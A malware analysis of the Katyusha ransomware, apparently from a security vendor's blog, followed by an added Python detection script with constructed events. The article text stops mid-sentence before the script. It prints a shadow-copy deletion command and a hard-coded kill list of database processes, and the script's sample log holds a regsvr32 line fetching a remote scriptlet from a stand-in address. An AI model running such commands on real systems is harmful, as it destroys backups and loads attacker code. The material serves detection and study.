Sophisticated Ransomware: “Katyusha”

Credit to Author: Ghanshyam More | Date: Fri, 14 Dec 2018 10:59:58 +0000

For several months, Quick Heal Security Labs has been observing an increase in ransomware activity. We have found one more interesting ransomware family, which encrypts files, appends the extension “.katyusha”, demands 0.5 BTC within three days and threatens to release the victim's data for public download if the ransom is not paid. The malware is bundled with many components, including the “DoublePulsar” and “EternalBlue” exploits, which it uses to spread over the network. It also uses the “Squiblydoo” technique (regsvr32.exe loading a scriptlet through scrobj.dll) as part of its spread across the network. The infection vector for this ransomware is still not confirmed; on the basis of its components, it may enter the system via spear phishing, malvertising, spam mail, SMB exploitation, etc.

Technical Analysis:

This malware is packed with MPRESS (v2.19) and is present on the victim's system under the name “katyusha.exe” in “%temp%”. It contains three components. On execution it drops them into C:\Windows\Temp and starts executing them:

– Svchost0.bat
– Zkts.exe
– Ktsi.exe

Katyusha checks for the following files to determine whether the system is already infected:

– “C:\_how_to_decrypt_you_files.txt”
– “C:\ProgramData\_how_to_decrypt_you_files.txt”

If the system is already infected, Katyusha creates a batch file (svchost0.bat) with the content shown in Fig 1, which deletes the malware's own copy and terminates it. If the system is not infected, it drops zkts.exe and ktsi.exe and executes them.

Fig 1: Content of Svchost0.bat

Zkts.exe: This file is a 7-Zip-compressed executable and the main component; it contains multiple sub-modules such as the network spreading module, the password stealing module, etc. On execution, zkts.exe extracts its components into “C:\Windows\Temp” (Mimikatz, katyusha.dll, the EternalBlue exploit, etc.), which Katyusha uses later in its activity.

Fig 2: Files dropped by zkts.exe

Ktsi.exe (Encryptor): This is the other main component and is also MPRESS-packed.
It is mainly used for file encryption and to drop the ransom note on the victim's system. The process is started independently by the main payload (katyusha.exe), as shown in Fig 3.

Fig 3: Call to CreateProcess() for ktsi.exe

On execution, ktsi.exe first kills the processes listed below (Fig 4) to release the handles of files, such as database files, that those processes hold locked, so that it can encrypt them. The list is hard-coded in the malware and consists mainly of database and web server processes:

mysqld.exe, httpd.exe, sqlsevr.exe, sqlwriter.exe, w3wp.exe, sqlagent.exe, fdhost.exe, fdlauncher.exe, reportingservicesservice.exe, omtsreco.exe, tnslsnr.exe, oracle.exe, emagent.exe, mysqld-nt.exe

Fig 4: Taskkill command execution

After the taskkill operation, the malware drops the ransom note in HTML and TXT format in the all-users Startup folder, so that it is shown to every user who logs on:

“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
– _how_to_decrypt_you_files.txt
– _how_to_decrypt_you_files.html

In “C:\ProgramData” and at the root of the C: drive it drops only the TXT ransom note, “_how_to_decrypt_you_files.txt”.

Fig 5: Ransom note

Ktsi.exe also deletes the Volume Shadow Copies by executing the following command, which removes the victim's ability to restore previous versions of files:

vssadmin delete shadows /all /quiet

Fig 6: Delete shadow copy

After these tasks, ktsi.exe starts file encryption (RSA) using the standard routines of the CRYPTOGAMS library. Signatures of these routines are found in the file, as shown in Fig 7.

Fig 7: CRYPTOGAMS strings

It encrypts files of all extensions except those listed in Fig 8.

Fig 8: Extensions excluded from encryption

It also contains an exclusion list of file and folder names (shown in Fig 9); if any of these words is found in an enumerated file path, that path is excluded from encryption. To keep the encryption from being interrupted, the list contains the names of a few security products.

Fig 9: Exclusion list of files and folders
Spreading Mechanism:

For network spreading, the files extracted from zkts.exe come into play (refer to Fig 2 for the extracted components). m32.exe and m64.exe are the Mimikatz tool, used to fetch credentials from the memory of lsass.exe. katyusha.exe first determines whether it is running on a 64-bit or a 32-bit system by calling IsWow64Process (the call's return value is nonzero on success; the flag it writes to its output parameter indicates whether the 32-bit process is running under WOW64, i.e. on 64-bit Windows) and executes the Mimikatz build matching the system architecture. Mimikatz writes its output to the following files in “C:\Windows\Temp”:

– snamelog : contains the fetched usernames.
– spasslog : contains the passwords for the respective usernames.

Fig 10: Check to determine system type and start Mimikatz

After Mimikatz has run, katyusha.exe reads the usernames from snamelog and the passwords from spasslog, which are then used to perform a brute force attack into the…
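The pre-encryption behaviours of ktsi.exe (killing the hard-coded database processes, deleting shadow copies, dropping the ransom note into the all-users Startup folder) and the staging of the spreading components and Mimikatz output in C:\Windows\Temp are all observable as process-creation and file-creation events. The following Python script is an added example, not code from the article or from Quick Heal, that runs a few behavioural rules over constructed events and combines them into a verdict. The simplified key="value" event format, every sample line, the documentation address 192.0.2.10 and the regsvr32 command line (the generic Squiblydoo pattern, not a command line recovered from the sample) are assumptions for illustration.

```python
"""Triage constructed process-creation and file-creation events for the
Katyusha behaviours described in the article (added example; the event
format and every log line below are constructed for illustration)."""
import re

# Processes ktsi.exe kills before encrypting (hard-coded list from the article).
KILLED_PROCESSES = {
    "mysqld.exe", "httpd.exe", "sqlsevr.exe", "sqlwriter.exe", "w3wp.exe",
    "sqlagent.exe", "fdhost.exe", "fdlauncher.exe", "reportingservicesservice.exe",
    "omtsreco.exe", "tnslsnr.exe", "oracle.exe", "emagent.exe", "mysqld-nt.exe",
}
# Components and Mimikatz output files staged in C:\Windows\Temp (from the article).
DROPPED_ARTIFACTS = {"svchost0.bat", "zkts.exe", "ktsi.exe", "katyusha.dll",
                     "m32.exe", "m64.exe", "snamelog", "spasslog"}
TEMP_DIR = r"c:\windows\temp"
STARTUP_DIR = r"c:\programdata\microsoft\windows\start menu\programs\startup"
RANSOM_NOTE = "_how_to_decrypt_you_files"

# Assumed simplified Sysmon-like format: <EventType> Key="value" Key="value" ...
EVENT_RE = re.compile(r'^(?P<kind>ProcessCreate|FileCreate)\s+(?P<fields>.*)$')
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_event(line):
    """Return a dict of lower-cased field names plus 'kind', or None if unparsable."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = {k.lower(): v for k, v in FIELD_RE.findall(m.group("fields"))}
    ev["kind"] = m.group("kind")
    return ev

def split_path(path):
    """Windows path -> (lower-cased directory, lower-cased file name)."""
    head, _, tail = path.replace("/", "\\").rpartition("\\")
    return head.lower(), tail.lower()

def check_event(ev):
    """Apply the behavioural rules to one event; return a list of (rule, detail)."""
    hits = []
    if ev["kind"] == "ProcessCreate":
        folder, image = split_path(ev.get("image", ""))
        cmd = ev.get("commandline", "").lower()
        if image == "taskkill.exe":
            killed = set(re.findall(r"/im\s+(\S+)", cmd)) & KILLED_PROCESSES
            if killed:
                hits.append(("db-process-kill", ", ".join(sorted(killed))))
        if image == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd:
            hits.append(("shadow-copy-deletion", cmd))
        # Squiblydoo: regsvr32 pulling a scriptlet through scrobj.dll.
        if image == "regsvr32.exe" and "scrobj.dll" in cmd and "/i:" in cmd:
            hits.append(("squiblydoo-regsvr32", cmd))
        if folder == TEMP_DIR and image in DROPPED_ARTIFACTS:
            hits.append(("katyusha-component-exec", image))
    elif ev["kind"] == "FileCreate":
        folder, name = split_path(ev.get("targetfilename", ""))
        if folder == TEMP_DIR and name in DROPPED_ARTIFACTS:
            hits.append(("katyusha-artifact-dropped", name))
        if name.startswith(RANSOM_NOTE):
            if folder == STARTUP_DIR:
                hits.append(("ransom-note-startup", name))
            elif folder in ("c:", r"c:\programdata"):
                hits.append(("ransom-note-drop", folder + "\\" + name))
    return hits

def triage(log_text):
    """Run every rule over every parsable line; return all (rule, detail) hits."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev:
            findings.extend(check_event(ev))
    return findings

# A lone vssadmin or taskkill is routine admin noise; two or more distinct
# Katyusha-specific behaviours on one host are what justify an alert.
STRONG_RULES = {"shadow-copy-deletion", "ransom-note-startup", "ransom-note-drop",
                "katyusha-component-exec", "katyusha-artifact-dropped",
                "squiblydoo-regsvr32"}

def verdict(findings):
    rules = {rule for rule, _ in findings}
    if len(rules & STRONG_RULES) >= 2:
        return "katyusha-like ransomware activity"
    return "suspicious" if rules else "clean"

# Constructed sample events (not a real capture); 192.0.2.10 is a documentation address.
SAMPLE_LOG = """\
ProcessCreate Image="C:\\Windows\\Temp\\ktsi.exe" CommandLine="C:\\Windows\\Temp\\ktsi.exe" ParentImage="C:\\Users\\victim\\AppData\\Local\\Temp\\katyusha.exe"
ProcessCreate Image="C:\\Windows\\System32\\taskkill.exe" CommandLine="taskkill /f /im mysqld.exe" ParentImage="C:\\Windows\\Temp\\ktsi.exe"
ProcessCreate Image="C:\\Windows\\System32\\taskkill.exe" CommandLine="taskkill /f /im notepad.exe" ParentImage="C:\\Windows\\explorer.exe"
ProcessCreate Image="C:\\Windows\\System32\\vssadmin.exe" CommandLine="vssadmin delete shadows /all /quiet" ParentImage="C:\\Windows\\Temp\\ktsi.exe"
ProcessCreate Image="C:\\Windows\\System32\\vssadmin.exe" CommandLine="vssadmin list shadows" ParentImage="C:\\Windows\\System32\\cmd.exe"
ProcessCreate Image="C:\\Windows\\System32\\regsvr32.exe" CommandLine="regsvr32 /s /n /u /i:http://192.0.2.10/k.sct scrobj.dll" ParentImage="C:\\Windows\\Temp\\zkts.exe"
FileCreate TargetFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\_how_to_decrypt_you_files.html" Image="C:\\Windows\\Temp\\ktsi.exe"
FileCreate TargetFilename="C:\\Windows\\Temp\\snamelog" Image="C:\\Windows\\Temp\\m64.exe"
FileCreate TargetFilename="C:\\Users\\victim\\Documents\\report.docx" Image="C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
"""

if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for rule, detail in hits:
        print(f"{rule:28} {detail}")
    print("verdict:", verdict(hits))
```

On the constructed sample the benign taskkill of notepad.exe and the "vssadmin list shadows" line produce no hits, while the six Katyusha-specific events do, which is the point of keying the rules on the hard-coded process list, the exact Startup and Temp paths and the shadow-deletion verb rather than on the tool names alone. Against real telemetry the same rules would be fed from Sysmon event IDs 1 and 11 (or Security 4688 with command-line logging) rather than from the simplified text format assumed here.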